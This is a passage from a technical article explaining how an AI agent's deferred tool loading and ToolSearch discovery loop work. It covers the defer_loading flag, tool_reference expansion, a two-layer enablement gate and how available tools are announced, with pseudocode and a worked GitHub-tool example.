&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Tool&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;result&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;sent&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;back&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;API:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;type:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"tool_result"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;tool_use_id:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;content:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;type:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"tool_reference"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tool_name:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"mcp__github__create_issue"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;type:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"tool_reference"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tool_name:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"mcp__github__list_issues"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is a beta API feature. The API server receives the &lt;code&gt;tool_reference&lt;/code&gt; block and expands it into the full tool definition in the model's context. The client never sends the definition itself — the API resolves the reference from the deferred schemas that were sent with &lt;code&gt;defer_loading: true&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;This is the key insight of the architecture. The client marks deferred tools with &lt;code&gt;defer_loading: true&lt;/code&gt; in their schema, telling the API "here's the definition, but don't show it to the model unless referenced." The &lt;code&gt;tool_reference&lt;/code&gt; block is the trigger that expands a deferred definition. The model sees the full schema in its context only after a successful search.&lt;/p&gt;

&lt;p&gt;Why not just return the full tool definition in the search result? Two reasons. First, the API handles the injection into the model's tool context — the client doesn't need to construct a new API request with the tool added. Second, &lt;code&gt;tool_reference&lt;/code&gt; is a structured content block that the API validates against the known deferred schemas. The client can't fabricate a tool definition in a tool_result and have it treated as a callable tool. The API is the authority on which tools exist.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Two-Layer Gate
&lt;/h3&gt;

&lt;p&gt;For tool search to actually engage, two checks must pass:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Optimistic check&lt;/strong&gt; (fast, stateless): Can tool search possibly be enabled? This runs early — during tool pool assembly — to decide whether ToolSearch itself should be included in the tool list. It checks mode and proxy gateway, but NOT model or threshold. This is called "optimistic" because it says "yes" even if the definitive check might say "no" later.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Definitive check&lt;/strong&gt; (async, contextual): Should tool search be used for this specific API request? This runs at request time with the full context: model name, tool list, token counts. It checks model support, ToolSearch availability, and (for &lt;code&gt;tst-auto&lt;/code&gt;) the threshold.&lt;/p&gt;

&lt;p&gt;The two-layer design avoids a chicken-and-egg problem. You can't check the definitive gate until you've assembled the tool pool. But the tool pool includes ToolSearch. If ToolSearch isn't in the pool, the definitive check will say "ToolSearch unavailable, disable." So the optimistic check decides whether to include ToolSearch, and the definitive check decides whether to use it.&lt;/p&gt;
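&lt;p&gt;The two gates can be sketched as a pair of predicates (field names and mode values other than &lt;code&gt;tst-auto&lt;/code&gt; are assumptions for illustration):&lt;/p&gt;

```python
def optimistic_check(settings) -> bool:
    # Fast and stateless: decides whether ToolSearch joins the pool.
    # Looks only at mode and proxy gateway, never at model or threshold.
    return settings["mode"] != "disabled" and not settings["proxy_blocks_search"]

def definitive_check(settings, model_supports_search, tool_search_in_pool,
                     tool_tokens) -> bool:
    # Request-time and contextual: decides whether deferral is used for
    # THIS request, given model support and (for tst-auto) the threshold.
    if not (model_supports_search and tool_search_in_pool):
        return False
    if settings["mode"] == "tst-auto":
        return tool_tokens >= settings["threshold"]
    return True
```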




&lt;h2&gt;
  
  
  The Discovery Loop
&lt;/h2&gt;

&lt;p&gt;Tool search creates a multi-turn protocol. On turn 1, the model sees only non-deferred tools plus ToolSearch. It calls ToolSearch. On turn 2, the discovered tools are available. But how does the system know which tools to include on turn 2?&lt;/p&gt;

&lt;h3&gt;
  
  
  Scanning Message History
&lt;/h3&gt;

&lt;p&gt;Before each API request, the system scans the conversation history for &lt;code&gt;tool_reference&lt;/code&gt; blocks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;extractDiscoveredToolNames&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="nx"&gt;discovered&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;empty&lt;/span&gt; &lt;span class="kd"&gt;set&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Compact&lt;/span&gt; &lt;span class="nx"&gt;boundaries&lt;/span&gt; &lt;span class="nx"&gt;carry&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nf"&gt;snapshot &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;explained&lt;/span&gt; &lt;span class="nx"&gt;later&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;compact_boundary&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;metadata&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;preCompactDiscoveredTools&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="nx"&gt;discovered&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;continue&lt;/span&gt;

        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;tool_reference&lt;/span&gt; &lt;span class="nx"&gt;blocks&lt;/span&gt; &lt;span class="nx"&gt;only&lt;/span&gt; &lt;span class="nx"&gt;appear&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt; &lt;span class="nx"&gt;messages&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tool_result&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;role&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;API&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;continue&lt;/span&gt;

        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;block&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;block&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;tool_result&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="nx"&gt;array&lt;/span&gt; &lt;span class="nx"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;item&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;block&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;item&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;tool_reference&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                        &lt;span class="nx"&gt;discovered&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;item&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;tool_name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;discovered&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The extracted set determines which deferred tools to include in the next request:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;filterToolsForRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tools&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;deferredToolNames&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;discoveredToolNames&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;where&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Always&lt;/span&gt; &lt;span class="nx"&gt;include&lt;/span&gt; &lt;span class="nx"&gt;non&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt;
        &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;deferredToolNames&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Always&lt;/span&gt; &lt;span class="nx"&gt;include&lt;/span&gt; &lt;span class="nx"&gt;ToolSearch&lt;/span&gt; &lt;span class="nx"&gt;itself&lt;/span&gt;
        &lt;span class="nx"&gt;OR&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;ToolSearch&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Include&lt;/span&gt; &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;that&lt;/span&gt; &lt;span class="nx"&gt;have&lt;/span&gt; &lt;span class="nx"&gt;been&lt;/span&gt; &lt;span class="nx"&gt;discovered&lt;/span&gt;
        &lt;span class="nx"&gt;OR&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;discoveredToolNames&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates an accumulating set. Once a tool is discovered via search, it stays available for the rest of the conversation. The model never needs to re-search for a tool it's already found.&lt;/p&gt;
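&lt;p&gt;A runnable version of the history scan, using the user-role message shape from the pseudocode (the compact-boundary branch is omitted for brevity):&lt;/p&gt;

```python
def extract_discovered(messages) -> set:
    discovered = set()
    for msg in messages:
        # tool_reference blocks only appear inside user-role messages.
        if msg.get("role") != "user":
            continue
        for block in msg.get("content", []):
            if block.get("type") == "tool_result" and isinstance(block.get("content"), list):
                for item in block["content"]:
                    if item.get("type") == "tool_reference":
                        discovered.add(item["tool_name"])
    return discovered

history = [
    {"role": "assistant", "content": [{"type": "text", "text": "Searching..."}]},
    {"role": "user", "content": [{"type": "tool_result", "content": [
        {"type": "tool_reference", "tool_name": "mcp__github__create_issue"}]}]},
]
extract_discovered(history)  # {"mcp__github__create_issue"}
```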

&lt;p&gt;There's an important detail in what gets sent to &lt;code&gt;toolToAPISchema&lt;/code&gt;. The filtering controls which tools appear in the API's tool array. But the ToolSearch prompt — which lists available deferred tools for the model to see — is generated from the &lt;em&gt;full&lt;/em&gt; tool list, not the filtered one. This separation ensures the model can always search the complete pool, even though only discovered tools have their schemas sent.&lt;/p&gt;

&lt;h3&gt;
  
  
  A Complete Round-Trip
&lt;/h3&gt;

&lt;p&gt;Let's trace a single discovery end-to-end:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Turn 1&lt;/strong&gt;: User says "Create a GitHub issue for this bug."&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;System computes deferred set: 147 MCP tools.&lt;/li&gt;
&lt;li&gt;System scans history: no &lt;code&gt;tool_reference&lt;/code&gt; blocks yet.&lt;/li&gt;
&lt;li&gt;Filtered tools: 25 built-in + ToolSearch. 147 deferred sent with &lt;code&gt;defer_loading: true&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Model sees 26 tools. It knows it needs GitHub. It calls ToolSearch.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Turn 1 response&lt;/strong&gt;: Model generates &lt;code&gt;tool_use&lt;/code&gt; for ToolSearch with query &lt;code&gt;"select:mcp__github__create_issue"&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Turn 1 result&lt;/strong&gt;: System looks up the name, finds it in deferred pool. Returns:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;type:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"tool_result"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;content:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;type:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"tool_reference"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tool_name:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"mcp__github__create_issue"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;]}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Turn 2&lt;/strong&gt;: System prepares next API request.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Scans history: finds &lt;code&gt;tool_reference&lt;/code&gt; for &lt;code&gt;mcp__github__create_issue&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Filtered tools: 25 built-in + ToolSearch + &lt;code&gt;mcp__github__create_issue&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Model sees 27 tools. &lt;code&gt;mcp__github__create_issue&lt;/code&gt; has full schema. Model calls it.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The discovery cost was one turn and ~200 tokens. The savings persist for the rest of the conversation — &lt;code&gt;mcp__github__create_issue&lt;/code&gt; stays in the filtered set.&lt;/p&gt;

&lt;h3&gt;
  
  
  The defer_loading Flag
&lt;/h3&gt;

&lt;p&gt;Each tool that passes through the filter gets serialized into an API schema. Deferred tools — those in &lt;code&gt;deferredToolNames&lt;/code&gt; — get an extra field:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;schema&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;description&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;description&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;input_schema&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;jsonSchema&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;defer_loading&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;--&lt;/span&gt; &lt;span class="nx"&gt;tells&lt;/span&gt; &lt;span class="na"&gt;API&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;definition&lt;/span&gt; &lt;span class="nx"&gt;present&lt;/span&gt; &lt;span class="nx"&gt;but&lt;/span&gt; &lt;span class="nx"&gt;hidden&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;defer_loading&lt;/code&gt; flag is the contract between client and API. It says: "I'm sending you this tool's definition so you can expand &lt;code&gt;tool_reference&lt;/code&gt; blocks that name it, but don't include it in the model's visible tool list unless a reference triggers it."&lt;/p&gt;

&lt;p&gt;Without this flag, sending a tool definition means the model sees it. With it, the definition is staged but invisible until referenced. This is what makes the system work — the API has all the information it needs to expand references without the client re-sending definitions on demand.&lt;/p&gt;
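&lt;p&gt;Putting the pieces together, serialization might look like this sketch (field names follow the schema above; the treatment of already-discovered tools is an assumption):&lt;/p&gt;

```python
def build_tools_payload(all_tools, deferred_names, discovered_names):
    payload = []
    for tool in all_tools:
        schema = {
            "name": tool["name"],
            "description": tool["description"],
            "input_schema": tool["schema"],
        }
        # Deferred tools that haven't been discovered are staged at the
        # API but hidden from the model until a tool_reference names them.
        if tool["name"] in deferred_names and tool["name"] not in discovered_names:
            schema["defer_loading"] = True
        payload.append(schema)
    return payload
```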

&lt;h3&gt;
  
  
  Announcing Available Tools
&lt;/h3&gt;

&lt;p&gt;The model needs to know what tools it can search for. There are two mechanisms for this, gated by a feature flag:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Pre-message approach&lt;/strong&gt; (original): Before the conversation messages, the system prepends a user message listing all deferred tool names:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;available-deferred-tools&amp;gt;&lt;/span&gt;
mcp__github__create_issue
mcp__github__list_issues
mcp__slack__send_message
...
&lt;span class="nt"&gt;&amp;lt;/available-deferred-tools&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Delta attachment approach&lt;/strong&gt; (newer): Instead of prepending the full list every turn, the system computes a diff against what's already been announced:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;getDeferredToolsDelta&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tools&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Scan&lt;/span&gt; &lt;span class="nx"&gt;prior&lt;/span&gt; &lt;span class="nx"&gt;attachment&lt;/span&gt; &lt;span class="nx"&gt;messages&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;previous&lt;/span&gt; &lt;span class="nx"&gt;announcements&lt;/span&gt;
    &lt;span class="nx"&gt;announced&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;empty&lt;/span&gt; &lt;span class="kd"&gt;set&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;attachment&lt;/span&gt; &lt;span class="k"&gt;of&lt;/span&gt; &lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;deferred_tools_delta&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;addedNames&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;announced&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;removedNames&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;announced&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;delete&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;where&lt;/span&gt; &lt;span class="nf"&gt;isDeferredTool&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;deferredNames&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;names&lt;/span&gt; &lt;span class="k"&gt;of&lt;/span&gt; &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt;
    &lt;span class="nx"&gt;poolNames&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;names&lt;/span&gt; &lt;span class="k"&gt;of&lt;/span&gt; &lt;span class="nx"&gt;all&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt;

    &lt;span class="nx"&gt;added&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;yet&lt;/span&gt; &lt;span class="nx"&gt;announced&lt;/span&gt;
    &lt;span class="nx"&gt;removed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;announced&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;no&lt;/span&gt; &lt;span class="nx"&gt;longer&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;pool&lt;/span&gt; &lt;span class="nx"&gt;AND&lt;/span&gt; &lt;span class="nx"&gt;no&lt;/span&gt; &lt;span class="nx"&gt;longer&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;base&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt;
